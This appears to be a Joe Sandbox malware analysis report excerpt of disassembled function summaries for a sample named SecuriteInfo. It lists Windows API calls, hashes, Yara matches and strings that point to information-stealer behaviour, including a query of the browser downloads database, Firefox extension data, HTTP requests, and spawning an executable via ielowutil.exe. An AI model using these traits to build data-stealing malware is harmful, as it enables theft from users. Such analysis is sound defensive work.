                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Similarity
                                      • API ID: lstrcpy$Process$CopyFileHeaplstrcat$AllocateCloseHandleOpenSystemTerminateTimelstrlenmemsetwsprintf
                                      • String ID:
                                      • API String ID: 1739585374-0
                                      • Opcode ID: e9936d8bd5ad586065688de1f68c94e9cb22ef9fad24aa3c85658e74526a190c
                                      • Instruction ID: c76e153d2313420b32638f7236cca9208619d6461cd4ed7be8e4d99548e5a4b7
                                      • Opcode Fuzzy Hash: e9936d8bd5ad586065688de1f68c94e9cb22ef9fad24aa3c85658e74526a190c
                                      • Instruction Fuzzy Hash: BD91067192010D6BDB45FBB0DE56DFEB378AE54780F404138F60676291EF60AA68CF61
                                      APIs
                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,?,?,00000000,?,?,?,0030BE47,?,?), ref: 0030A349
                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0030BE47,?,?), ref: 0030A376
                                      • GetLocalTime.KERNEL32(?,?,?,?,0030BE47,?,?), ref: 0030A3AC
                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,0030BE47,?,?), ref: 0030A3BA
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0030A3F2
                                        • Part of subcall function 00309D90: GetFileInformationByHandle.KERNEL32(?,?,?), ref: 00309D9F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Similarity
                                      • API ID: File$Time$Pointer$HandleInformationLocalSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID:
                                      • API String ID: 89576305-0
                                      • Opcode ID: 9b6e03711110aebd3583aa2862a7923cf977f531d4d48d8fb26b2af522de4ed8
                                      • Instruction ID: 28c43230083aff1829b9ee1867ae2dadfb6606eecffbf61d24f4d1c933d8582f
                                      • Opcode Fuzzy Hash: 9b6e03711110aebd3583aa2862a7923cf977f531d4d48d8fb26b2af522de4ed8
                                      • Instruction Fuzzy Hash: 804163B5500B04AFD725DF79D840AABBBF8FB48310F008A1EE99AC6690E770A544CB60
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Similarity
                                      • API ID: lstrcpynlstrlenwsprintf
                                      • String ID: %s%s
                                      • API String ID: 1206339513-3252725368
                                      • Opcode ID: eeb16c0882eb163ebcdff1d83f03519134a6e69277c8b8c605ee9354802bff50
                                      • Instruction ID: b5d7fd7737264755e84268a5cca0f4074cbf2a2f02c87e26863517f1decbffdf
                                      • Opcode Fuzzy Hash: eeb16c0882eb163ebcdff1d83f03519134a6e69277c8b8c605ee9354802bff50
                                      • Instruction Fuzzy Hash: 38F096732041196FEB204F5DEC48DA7BBACEFD9368B054125F91887341C770AC1686A1
                                      APIs
                                      • __getptd.LIBCMT ref: 0030E50C
                                        • Part of subcall function 0030DA31: __getptd_noexit.LIBCMT ref: 0030DA34
                                        • Part of subcall function 0030DA31: __amsg_exit.LIBCMT ref: 0030DA41
                                      • __getptd.LIBCMT ref: 0030E523
                                      • __amsg_exit.LIBCMT ref: 0030E531
                                      • __lock.LIBCMT ref: 0030E541
                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 0030E555
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                      • String ID:
                                      • API String ID: 938513278-0
                                      • Opcode ID: 59c93aafb7bf661fc9be09fbe0fa019536ea9202ee73b68b4ba65401b6fe0d72
                                      • Instruction ID: ad7b001d08e7ba044240fd36d355d18e45dadf45592841814794733e04c94186
                                      • Opcode Fuzzy Hash: 59c93aafb7bf661fc9be09fbe0fa019536ea9202ee73b68b4ba65401b6fe0d72
                                      • Instruction Fuzzy Hash: F2F0F032B437009AD623BBB8A823B9D37A06F04324F114A09F814AF2C2DB6499418A69
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 002F43E0: GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 002F441C
                                        • Part of subcall function 002F43E0: RtlAllocateHeap.NTDLL(00000000), ref: 002F4423
                                        • Part of subcall function 002F43E0: InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002F4442
                                        • Part of subcall function 002F43E0: StrCmpCA.SHLWAPI(?,02F43058), ref: 002F445A
                                        • Part of subcall function 002F43E0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002F4482
                                        • Part of subcall function 002F43E0: HttpOpenRequestA.WININET(00000000,GET,?,02F45FE0,00000000,00000000,-00400100,00000000), ref: 002F44BC
                                        • Part of subcall function 002F43E0: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 002F44E0
                                        • Part of subcall function 002F43E0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002F44EF
                                        • Part of subcall function 00300B80: GetSystemTime.KERNEL32(?,02F46C20,003101E9,?,00000000,?,?,?,?,?,002F46E7,?,00000014), ref: 00300BA9
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                        • Part of subcall function 00301280: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,?,00302B26,?), ref: 003012A0
                                      • memset.MSVCRT ref: 00301821
                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000020,00000000,00000000,?,?,00000000,?,00313418,?,?), ref: 00301884
                                      Strings
                                      • .exe, xrefs: 0030176C
                                      • C:\Program Files (x86)\Internet Explorer\ielowutil.exe, xrefs: 003018D6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$Internet$CreateHeapHttpOpenProcessRequestlstrcat$AllocateConnectFileOptionSendSystemTimelstrlenmemset
                                      • String ID: .exe$C:\Program Files (x86)\Internet Explorer\ielowutil.exe
                                      • API String ID: 1306395318-2544896153
                                      • Opcode ID: 4822cf9ee542fc90070a472039b907a37f2688dedc05bffae7729ef961ed3c70
                                      • Instruction ID: 55b73a4b92e4c62ee93f627015f68bde05d9e54a31288667e567a55acaec2144
                                      • Opcode Fuzzy Hash: 4822cf9ee542fc90070a472039b907a37f2688dedc05bffae7729ef961ed3c70
                                      • Instruction Fuzzy Hash: 4651537192010C6ADB59FBB0DD66EFDB378AF54780F404139FA0166291EE70AA58CF60
                                      APIs
                                      • std::_Xinvalid_argument.LIBCPMT ref: 002FD91C
                                      • std::_Xinvalid_argument.LIBCPMT ref: 002FD936
                                      • memcpy.MSVCRT(?,?,?), ref: 002FD98C
                                        • Part of subcall function 002FD700: std::_Xinvalid_argument.LIBCPMT ref: 002FD719
                                        • Part of subcall function 002FD700: std::_Xinvalid_argument.LIBCPMT ref: 002FD73A
                                        • Part of subcall function 002FD700: std::_Xinvalid_argument.LIBCPMT ref: 002FD755
                                        • Part of subcall function 002FD700: memcpy.MSVCRT(?,?,?), ref: 002FD7BD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Xinvalid_argumentstd::_$memcpy
                                      • String ID: string too long
                                      • API String ID: 2304785028-2556327735
                                      • Opcode ID: 780309356e44994e79641b5e47f01ba333561aec0ac3aaedbfc38c0eb9e4ecda
                                      • Instruction ID: 56787d718492e22ba16ac02d65d1463549b8c03d15ae407e311b27c70fc9c033
                                      • Opcode Fuzzy Hash: 780309356e44994e79641b5e47f01ba333561aec0ac3aaedbfc38c0eb9e4ecda
                                      • Instruction Fuzzy Hash: 7431D7323201184BD7249E9CD480A7EF7EFEFD5BA0760493EE6968B681C7B19C548790
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00300300
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00300307
                                      • wsprintfA.USER32 ref: 00300317
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateProcesslstrcpywsprintf
                                      • String ID: %dx%d
                                      • API String ID: 1695172769-2206825331
                                      • Opcode ID: 92f3644ef977f1a746c15a362016a683411b8742478ed648f067387b34270d9c
                                      • Instruction ID: c6b0e74bdb8eed61461ccfd88dbffe60ed9961046c765fc6321eb7dad5ba3fdc
                                      • Opcode Fuzzy Hash: 92f3644ef977f1a746c15a362016a683411b8742478ed648f067387b34270d9c
                                      • Instruction Fuzzy Hash: 41F068327413147BF62027B46C0EF9A7B9CEF56B91F080521F705D71D0C7A1580657A5
                                      APIs
                                      • CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,?,?,00302B26,?), ref: 003012A0
                                      • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,00302B26,?), ref: 003012CB
                                      • CloseHandle.KERNEL32(00000000,?,?,00302B26,?), ref: 003012D6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleWrite
                                      • String ID: &+0
                                      • API String ID: 1065093856-2468884101
                                      • Opcode ID: c3aa93e318a48a57bf99f69fc1792839ce4c055f07ed2eee0eab7c674cc2165a
                                      • Instruction ID: 539d3a066335ddfaa4e98dae2e1b7d36352fd539c587cd6ac504d96ccc140ddd
                                      • Opcode Fuzzy Hash: c3aa93e318a48a57bf99f69fc1792839ce4c055f07ed2eee0eab7c674cc2165a
                                      • Instruction Fuzzy Hash: F5F0AF315502187BEA20EF60EC4AFFA776CDF117A0F004265FE05A62C0DBA0AD168AE0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$lstrcat$lstrlen
                                      • String ID: Downloads$SELECT target_path, tab_url from downloads
                                      • API String ID: 2762123234-2176162482
                                      • Opcode ID: afc4687a823e7751790bf810f0c4ba289e3d3cb95633d29ed91f69ba7d0c5bb5
                                      • Instruction ID: 757835457aae1bd2a0c64ece71fa0c5b150e424b5d4d63b274d080a878a61ddb
                                      • Opcode Fuzzy Hash: afc4687a823e7751790bf810f0c4ba289e3d3cb95633d29ed91f69ba7d0c5bb5
                                      • Instruction Fuzzy Hash: C691067192010DABDB59EBA0CE56DFEB378AF54780F504538F60272191EF74AA28CF61
                                      APIs
                                      • ??_U@YAPAXI@Z.MSVCRT(00000000), ref: 002FF1E1
                                      • VirtualQueryEx.KERNEL32(?,?,?,0000001C), ref: 002FF22D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: QueryVirtual
                                      • String ID:
                                      • API String ID: 1804819252-0
                                      • Opcode ID: e0318bdd681fd94c1e0703256955d8c0c4a1d4c847e2ff56baf7d2332a51473e
                                      • Instruction ID: a9cfea75d37e36d437a7275b57bff61348ff211ae7ddd5d1d70fb79eba925d87
                                      • Opcode Fuzzy Hash: e0318bdd681fd94c1e0703256955d8c0c4a1d4c847e2ff56baf7d2332a51473e
                                      • Instruction Fuzzy Hash: 2B51C076A1001DABEB14CE68DD40ABEB3EAEF88340F148139FE09E3340D635DD118BA1
                                      APIs
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 002F6C20: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000,?,002F1916,?), ref: 002F6C3F
                                        • Part of subcall function 002F6C20: GetFileSizeEx.KERNEL32(00000000,?,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6C55
                                        • Part of subcall function 002F6C20: LocalAlloc.KERNEL32(00000040,?,?,?,002F1916,?), ref: 002F6C70
                                        • Part of subcall function 002F6C20: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,002F1916,?), ref: 002F6C89
                                        • Part of subcall function 002F6C20: CloseHandle.KERNEL32(00000000,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6CB1
                                        • Part of subcall function 00300DA0: LocalAlloc.KERNEL32(00000040,002F87D9,?,?,?,?,002F87D8,00000000,00000000), ref: 00300DBC
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                        • Part of subcall function 002FF940: lstrcpy.KERNEL32(00000000,?), ref: 002FF981
                                        • Part of subcall function 002FF940: lstrcat.KERNEL32(00000000), ref: 002FF98D
                                      • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00313544,003101E9), ref: 002FB224
                                      • lstrlen.KERNEL32(00000000), ref: 002FB240
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                      • String ID: ^userContextId=4294967295$moz-extension+++
                                      • API String ID: 161838763-3310892237
                                      • Opcode ID: 4e10920772b3c997ea3acb245fdb0c48bef8af49087a2b0190bc70f991d9a7f4
                                      • Instruction ID: 14f190aadc0aaf7a2c04fa4504edaebbd620087879b0c870c9206a88efc07900
                                      • Opcode Fuzzy Hash: 4e10920772b3c997ea3acb245fdb0c48bef8af49087a2b0190bc70f991d9a7f4
                                      • Instruction Fuzzy Hash: 5851137192010D6BDB58FB70DE669FDB739AF547C0F404138FD0262291EF64AA28CEA1
                                      APIs
                                      • GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 002FFE02
                                      • GetLastError.KERNEL32 ref: 002FFE10
                                      • GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 002FFE48
                                        • Part of subcall function 00300B20: GetProcessHeap.KERNEL32(00000000,002F66B7,?,002F66B7,?), ref: 00300B2D
                                        • Part of subcall function 00300B20: HeapFree.KERNEL32(00000000,?,002F66B7,?), ref: 00300B34
                                      • wsprintfA.USER32 ref: 002FFE92
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: HeapInformationLogicalProcessor$ErrorFreeLastProcesswsprintf
                                      • String ID:
                                      • API String ID: 837085947-0
                                      • Opcode ID: f8c5f1be7eb61f9dae5a531a25f6b449bfbf25949a020e961825876a4fecf49f
                                      • Instruction ID: 2d1588766ede766c49dd847fd797d947c0775c5ae0550b71078a504bcb5192b1
                                      • Opcode Fuzzy Hash: f8c5f1be7eb61f9dae5a531a25f6b449bfbf25949a020e961825876a4fecf49f
                                      • Instruction Fuzzy Hash: CA213332E1122EA7DB219F64AD40ABFB7A8EF40B50F180174EE0896213E7319E2586D1
                                      APIs
                                      • GetLocalTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,0030BE6F), ref: 0030A568
                                      • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0030BE6F), ref: 0030A576
                                      • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0030BE6F), ref: 0030A590
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0030A5B0
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Time$FileSystem$LocalUnothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID:
                                      • API String ID: 568878067-0
                                      • Opcode ID: 818412e8e8a0b6793b022224b6fdc477e50400084c033ae3e5f8a8bee80d677a
                                      • Instruction ID: 857bb248490c173523369ac482d8f031a8a5884b11b750d832b49b78bf1be473
                                      • Opcode Fuzzy Hash: 818412e8e8a0b6793b022224b6fdc477e50400084c033ae3e5f8a8bee80d677a
                                      • Instruction Fuzzy Hash: E2315E71D10B189FDB19CFA9C890AAAFBF5FB48304B008A2EE19AD3750D770A504CF54
                                      APIs
                                      • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 00300FAD
                                      • GetFileSizeEx.KERNEL32(00000000,?), ref: 00300FBF
                                      • CloseHandle.KERNEL32(00000000), ref: 00300FCA
                                      • CloseHandle.KERNEL32(00000000), ref: 00300FD9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseFileHandle$CreateSize
                                      • String ID:
                                      • API String ID: 4148174661-0
                                      • Opcode ID: fe457b3fb61764a6c1af3d2fb60293778aaf8336378d4b9063d34a123fbefbf9
                                      • Instruction ID: 1a5ada2b4a8ab1a339c1cfd0164635ae0f6eabed3dada54af71ca0f6c12247cf
                                      • Opcode Fuzzy Hash: fe457b3fb61764a6c1af3d2fb60293778aaf8336378d4b9063d34a123fbefbf9
                                      • Instruction Fuzzy Hash: 5AF0B436641218ABE7309BA8AC0DF9A776CEF09711F000245FD04B31D0EB707A0656A0
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002FFB6E
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 002FFB75
                                      • GetLocalTime.KERNEL32(?), ref: 002FFB81
                                      • wsprintfA.USER32 ref: 002FFBAD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateLocalProcessTimewsprintf
                                      • String ID:
                                      • API String ID: 377395780-0
                                      • Opcode ID: 1c797eccddc58f51d73e04e76399793b1ada1759766da1e736d24c16007c7c92
                                      • Instruction ID: 7f1ca562027b953304524cb87e954cd3648ced0c9466dae34f4f889ec997fa68
                                      • Opcode Fuzzy Hash: 1c797eccddc58f51d73e04e76399793b1ada1759766da1e736d24c16007c7c92
                                      • Instruction Fuzzy Hash: 83F0B4B1904128BBD710ABD59C089FF77FCFF48B02F000149FA4591180E7785955E3B1
                                      APIs
                                      • std::_Xinvalid_argument.LIBCPMT ref: 002FDB25
                                      • memcpy.MSVCRT(?,?,?), ref: 002FDB76
                                        • Part of subcall function 002FD9C0: std::_Xinvalid_argument.LIBCPMT ref: 002FD9DA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Xinvalid_argumentstd::_$memcpy
                                      • String ID: string too long
                                      • API String ID: 2304785028-2556327735
                                      • Opcode ID: 439fc195bd6a5df532355c0a59281537ddc1b8bb7a567f239d54fe76bd3872b8
                                      • Instruction ID: 65f4dbc06ddb17770c26cc175671d55dccac420e9938ded8f9431fc20fbe0196
                                      • Opcode Fuzzy Hash: 439fc195bd6a5df532355c0a59281537ddc1b8bb7a567f239d54fe76bd3872b8
                                      • Instruction Fuzzy Hash: 9131E9323246188BD7259E5CE880A7AF7EFEBA57A4B21093BF641C7641C761DC6087A4
                                      APIs
                                      • lstrlen.KERNEL32(00000000), ref: 00303120
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003031CD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen
                                      • String ID: ERROR
                                      • API String ID: 1659193697-2861137601
                                      • Opcode ID: 909dc0947a1e70b16d239f696fbf4e1a7ec9eef890421d15c904b8119fd1c8ef
                                      • Instruction ID: 6de26b205a575b1f6bd0b9512caa8c5a3752471e8e63d642ba6c298df007aa86
                                      • Opcode Fuzzy Hash: 909dc0947a1e70b16d239f696fbf4e1a7ec9eef890421d15c904b8119fd1c8ef
                                      • Instruction Fuzzy Hash: BA31C371910208ABCB00FF64DD46BAEBB78EF54790F048138F51697381DB349615CBD5
                                      APIs
                                      • std::_Xinvalid_argument.LIBCPMT ref: 002FD80B
                                        • Part of subcall function 0030F693: std::exception::exception.LIBCMT ref: 0030F6A8
                                        • Part of subcall function 0030F693: __CxxThrowException@8.LIBCMT ref: 0030F6BD
                                        • Part of subcall function 0030F693: std::exception::exception.LIBCMT ref: 0030F6CE
                                      • std::_Xinvalid_argument.LIBCPMT ref: 002FD822
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                      • String ID: string too long
                                      • API String ID: 963545896-2556327735
                                      • Opcode ID: e329b62ff309e3f957f99604beca69cfa73265dbc4d7bf72ddaf64a5da69406f
                                      • Instruction ID: 86457465533c3e3dc6d15126778a18aafe8f03149d04e6ff3d5b997a23073251
                                      • Opcode Fuzzy Hash: e329b62ff309e3f957f99604beca69cfa73265dbc4d7bf72ddaf64a5da69406f
                                      • Instruction Fuzzy Hash: B111E4723146184BD331AD5CA880B7AF3EEEB957A0F10063FF6918B691C7A1985183A0
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                      • GetSystemTime.KERNEL32(?,02F46C20,003101E9,?,00000000,?,?,?,?,?,002F46E7,?,00000014), ref: 00300BA9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: SystemTimelstrcpy
                                      • String ID: F/$F/
                                      • API String ID: 62757014-2085053079
                                      • Opcode ID: 66299f149e201045c61c0abe7c5e0aeb2f0bc9f2ad7495d097ec88f4319c519a
                                      • Instruction ID: 25efa54106da882151452874cb25d17e097265ed3fef3fb9aff669d0073e640f
                                      • Opcode Fuzzy Hash: 66299f149e201045c61c0abe7c5e0aeb2f0bc9f2ad7495d097ec88f4319c519a
                                      • Instruction Fuzzy Hash: DC1124716201086BC71DEF78DD919BEB7A8EF68300B00813DED05DB291EA78D915DB90
                                      APIs
                                      • std::_Xinvalid_argument.LIBCPMT ref: 002FD4C6
                                        • Part of subcall function 0030F6E0: std::exception::exception.LIBCMT ref: 0030F6F5
                                        • Part of subcall function 0030F6E0: __CxxThrowException@8.LIBCMT ref: 0030F70A
                                        • Part of subcall function 0030F6E0: std::exception::exception.LIBCMT ref: 0030F71B
                                      • memmove.MSVCRT(?,?,?), ref: 002FD4FF
                                      Strings
                                      • invalid string position, xrefs: 002FD4C1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
